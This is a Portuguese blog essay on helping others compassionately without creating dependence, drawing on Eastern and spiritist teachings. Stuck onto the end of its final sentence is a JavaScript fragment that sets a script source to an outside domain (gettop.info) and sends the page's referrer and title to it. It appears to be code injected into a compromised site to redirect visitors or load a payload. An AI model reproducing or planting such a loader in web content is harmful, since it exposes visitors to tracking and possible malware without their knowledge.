Ajude o outro a ajudar-se

 

Diariamente somos procurados por pessoas que querem contar seus dramas e, às vezes, pensam que podemos fazer milagres. Muitos acham que querem ser ajudadas, mas, no fundo, querem apenas dar satisfação a si mesmas porque estão satisfeitas no seu sofrimento. Sofrer dá poder. As pessoas sentem pena, solidarizam-se e, pra muita gente, torna-se um vício.

Os casados, em determinadas situações, inventam doenças ou mostram-se muito sofredores para aprisionar o parceiro ou parceira em casa. Ajudar alguém não é tarefa fácil. Indivíduos inescrupulosos percebem a preguiça humana em querer resolver problemas sem esforço, e fundam igrejas com promessas de milagres para extorquir os incautos.

Ajudar é uma arte que deve associar sentimento e razão, nunca esquecendo que o objetivo é somente clarear os caminhos para que o outro enxergue a solução. Ajude e passe adiante. Ajude e desprenda-se dos resultados. Ajude, mas não permita que a pessoa crie dependência em relação a você. Ajude de forma compassiva, mas evite o sentimentalismo.

Os Budas existem para apontar o caminho e não para caminhar por nós, ensinam os Mestres do Oriente. Ao ajudar, nunca esqueça que você é apenas um facilitador. Se para ajudar você contar com a ajuda de algum guia espiritual jamais poderá cobrar porque ou bons espíritos não se prestam a esse tipo de comércio e, seguramente, você será assistido por seres vagabundos que posteriormente lhe escravizarão.

Quando ajudar, evite impacientar-se, irritar-se ou condenar porque com essas posturas você poderá captar a energia negativa do outro. Coloque-se de forma compassiva (torcida para que a pessoa supere a dor ou fortaleça-se); fale com entusiasmo, sem estimular ilusões. Muitas vezes, podemos apenas a ajudar o outro a fortalecer-se para continuar carregando sua cruz sem esquecer o ensinamento do Mestre: “o que quiseres receber faça-o ao outro”.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário